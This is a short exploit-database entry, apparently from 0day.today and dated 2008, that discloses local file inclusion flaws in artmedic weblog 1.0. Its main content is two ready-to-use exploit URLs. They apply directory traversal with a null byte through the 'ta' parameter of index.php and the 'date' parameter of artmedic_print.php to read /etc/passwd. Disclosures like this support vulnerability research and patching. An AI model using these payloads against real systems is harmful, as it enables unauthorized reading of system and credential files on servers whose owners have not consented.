id: 2636
date: 02/14/2008
title: artmedic weblog 1.0 Multiple Local File Inclusion Vulnerabilities
author: muuratsalo
cves: 

=================================================================
artmedic weblog 1.0 Multiple Local File Inclusion Vulnerabilities
=================================================================



artmedic weblog multiple local file inclusion vulnerabilities 

download   http://artmedic-phpscripts.de/index.php?did=artmedic_weblog.zip

author     muuratsalo

exploits   
http://localhost/artmedic_weblog/index.php?ta=../../../../../../../../../../etc/passwd%00
http://localhost/artmedic_weblog/artmedic_print.php?date=../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-26]  #